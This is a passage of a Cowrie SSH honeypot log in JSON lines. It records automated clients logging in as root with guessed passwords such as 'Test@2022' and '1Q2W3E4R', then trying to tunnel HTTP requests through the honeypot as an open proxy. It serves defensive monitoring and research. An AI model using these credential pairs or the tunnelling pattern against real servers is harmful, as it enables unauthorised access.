{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.946632Z","src_ip":"77.83.207.83","session":"d3187f155d85"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.198745Z","src_ip":"77.83.207.83","session":"d3187f155d85"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7935,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7935","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.250762Z","session":"d3187f155d85"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.301421Z","src_ip":"77.83.207.83","session":"d3187f155d85"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.305502Z","src_ip":"212.227.235.229","session":"9cb77ceeb8d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.307892Z","src_ip":"212.227.235.229","session":"9cb77ceeb8d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":9396,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:9396","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.444791Z","session":"d3187f155d85"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.495322Z","src_ip":"77.83.207.83","session":"d3187f155d85"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":21882,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:21882","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.637065Z","session":"d3187f155d85"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.687493Z","src_ip":"77.83.207.83","session":"d3187f155d85"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.738989Z","src_ip":"77.83.207.83","session":"d3187f155d85"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":21210,"dst_ip":"1.2.3.4","dst_port":22,"session":"31d978450ae7","protocol":"ssh","message":"New connection: 77.83.207.83:21210 (1.2.3.4:22) [session: 31d978450ae7]","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.788779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.789657Z","src_ip":"77.83.207.83","session":"31d978450ae7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:07.839831Z","src_ip":"77.83.207.83","session":"31d978450ae7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.091088Z","src_ip":"77.83.207.83","session":"31d978450ae7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15706,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15706","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.142549Z","session":"31d978450ae7"}
{"eventid":"cowrie.login.failed","username":"master","password":"12345678","message":"login attempt [master/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.185745Z","src_ip":"212.227.125.160","session":"32cf0977b18b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.192863Z","src_ip":"77.83.207.83","session":"31d978450ae7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":10502,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10502","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.336666Z","session":"31d978450ae7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.387024Z","src_ip":"77.83.207.83","session":"31d978450ae7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":19881,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19881","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.528796Z","session":"31d978450ae7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.579459Z","src_ip":"77.83.207.83","session":"31d978450ae7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.630868Z","src_ip":"77.83.207.83","session":"31d978450ae7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":21322,"dst_ip":"1.2.3.4","dst_port":22,"session":"93d247d7b1d1","protocol":"ssh","message":"New connection: 77.83.207.83:21322 (1.2.3.4:22) [session: 93d247d7b1d1]","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.680293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.681230Z","src_ip":"77.83.207.83","session":"93d247d7b1d1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.731498Z","src_ip":"77.83.207.83","session":"93d247d7b1d1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:08.982096Z","src_ip":"77.83.207.83","session":"93d247d7b1d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17515,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17515","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.033298Z","session":"93d247d7b1d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.083811Z","src_ip":"77.83.207.83","session":"93d247d7b1d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7900,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7900","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.224611Z","session":"93d247d7b1d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.274891Z","src_ip":"77.83.207.83","session":"93d247d7b1d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":17371,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17371","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.416631Z","session":"93d247d7b1d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.467445Z","src_ip":"77.83.207.83","session":"93d247d7b1d1"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.475474Z","src_ip":"212.227.125.160","session":"8ec147866074"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.518519Z","src_ip":"77.83.207.83","session":"93d247d7b1d1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":21439,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3a490c04b50","protocol":"ssh","message":"New connection: 77.83.207.83:21439 (1.2.3.4:22) [session: f3a490c04b50]","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.566943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.567752Z","src_ip":"77.83.207.83","session":"f3a490c04b50"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.617652Z","src_ip":"77.83.207.83","session":"f3a490c04b50"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.866153Z","src_ip":"77.83.207.83","session":"f3a490c04b50"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":197,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:197","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.917730Z","session":"f3a490c04b50"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.942210Z","src_ip":"212.227.125.160","session":"32cf0977b18b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:09.967695Z","src_ip":"77.83.207.83","session":"f3a490c04b50"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22752,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22752","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.108233Z","session":"f3a490c04b50"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.158235Z","src_ip":"77.83.207.83","session":"f3a490c04b50"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":11619,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11619","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.300122Z","session":"f3a490c04b50"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.349957Z","src_ip":"77.83.207.83","session":"f3a490c04b50"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.400637Z","src_ip":"77.83.207.83","session":"f3a490c04b50"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":21543,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae3eeb7d7742","protocol":"ssh","message":"New connection: 77.83.207.83:21543 (1.2.3.4:22) [session: ae3eeb7d7742]","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.448704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:10.449576Z","src_ip":"77.83.207.83","session":"ae3eeb7d7742"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cb